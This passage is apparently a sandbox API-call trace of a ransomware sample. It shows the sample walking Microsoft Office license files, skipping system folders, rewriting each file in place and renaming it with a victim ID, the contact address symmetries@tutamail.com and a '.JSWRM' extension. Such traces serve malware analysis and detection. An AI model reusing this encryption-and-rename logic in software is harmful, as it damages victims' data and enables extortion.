Size=0x30) returned 0x22d0a0 [0105.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0105.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0105.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0105.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0105.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0105.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0105.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.416] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6a54cdd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6a54cdd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6cb7248, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription2-pl.xrm-ms", cAlternateFileName="O3B74B~1.XRM")) returned 1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2=".") returned 1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="..") returned 1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="...") returned 1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="windows") returned -1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="recovery") returned -1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.416] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.417] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.417] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-pl.xrm-ms", lpString2="msocache") returned 1 [0105.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0105.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0105.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0105.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.417] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0105.418] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0105.418] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.421] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.421] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.421] CloseHandle (hObject=0x45c) returned 1 [0105.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0105.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0105.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0105.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0105.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.421] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0105.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0105.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0105.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.422] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe64f781d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe64f781d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6628a99, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6e65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription2-ppd.xrm-ms", cAlternateFileName="O3CF14~1.XRM")) returned 1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2=".") returned 1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="..") returned 1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="...") returned 1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="windows") returned -1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.431] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0105.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0105.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0105.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0105.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0105.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.432] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=28261) returned 1 [0105.432] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e60) returned 0x24c1d0 [0105.432] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6e60, lpOverlapped=0x0) returned 1 [0105.435] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.435] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6e60, lpOverlapped=0x0) returned 1 [0105.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.435] CloseHandle (hObject=0x45c) returned 1 [0105.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0105.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0105.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0105.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0105.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0105.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.436] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.437] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe64d15f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe64d15f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe65dc66b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription2-ul-oob.xrm-ms", cAlternateFileName="O3F5D3~1.XRM")) returned 1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.437] lstrcmpiW (lpString1="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0105.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0105.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0105.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription2-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0105.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0105.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0105.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.438] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11646) returned 1 [0105.438] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.438] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.441] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 